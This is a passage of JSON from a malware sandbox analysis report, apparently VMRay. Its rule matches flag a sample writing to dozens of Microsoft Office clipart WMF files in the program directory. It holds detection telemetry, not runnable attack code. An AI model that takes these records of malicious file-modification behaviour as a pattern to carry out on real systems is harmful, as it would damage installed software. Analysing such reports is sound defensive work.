Office\\CLIPART\\PUB60COR\\SO00726_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00726_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43115", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00726_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00728_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00728_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43132", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00728_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00732_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00732_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43139", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00732_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00734_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00734_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43146", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00734_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00735_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00735_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43153", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00735_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00736_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00736_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43160", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00736_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00768_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43167", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00768_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00783_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00783_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43176", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00783_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00820_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43183", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00820_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00828_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43192", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00828_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00834_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43199", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00834_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00837_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43206", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00837_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00910_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00910_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43213", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00910_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00911_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00911_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43220", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00911_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00913_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43227", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00913_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00914_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43234", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00914_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00915_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43241", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00915_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00916_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00916_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43248", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00916_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00917_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00917_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43255", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00917_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00918_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00918_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43262", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00918_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00935_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00935_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43269", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00935_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00938_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00938_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43276", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00938_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00941_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00941_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43283", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00941_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00942_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43290", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00942_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00943_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00943_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43297", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so00943_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01044_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43304", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01044_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01063_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43315", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01063_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01236_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43324", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01236_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01560_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43339", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01560_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01561_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43348", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01561_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01563_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43357", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01563_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01566_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43366", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\so01566_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01568_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_43375", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, 